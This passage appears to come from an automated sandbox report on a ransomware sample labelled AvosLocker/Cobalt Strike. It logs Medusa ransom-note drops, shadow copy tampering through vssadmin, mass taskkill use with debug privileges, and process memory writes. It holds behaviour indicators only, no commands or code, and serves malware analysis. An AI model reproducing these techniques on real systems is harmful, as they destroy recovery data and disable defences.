File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\currency.html C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\DVD Maker\es-ES\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BABY_01.MID C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10358_.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\ja-JP\sbdrop.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198020.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02444_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2700 wrote to memory of 2760 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2760 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2760 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2760 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2912 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2704 wrote to memory of 2588 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2704 wrote to memory of 2588 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2704 wrote to memory of 2588 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2704 wrote to memory of 2588 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2596 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2596 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2596 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2596 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2552 wrote to memory of 2604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 2604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 2604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 2604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2616 wrote to memory of 1708 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2616 wrote to memory of 1708 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2616 wrote to memory of 1708 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2616 wrote to memory of 1708 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3060 wrote to memory of 2316 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3060 wrote to memory of 2316 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3060 wrote to memory of 2316 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3060 wrote to memory of 2316 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Uses Volume Shadow Copy service COM API

ransomware
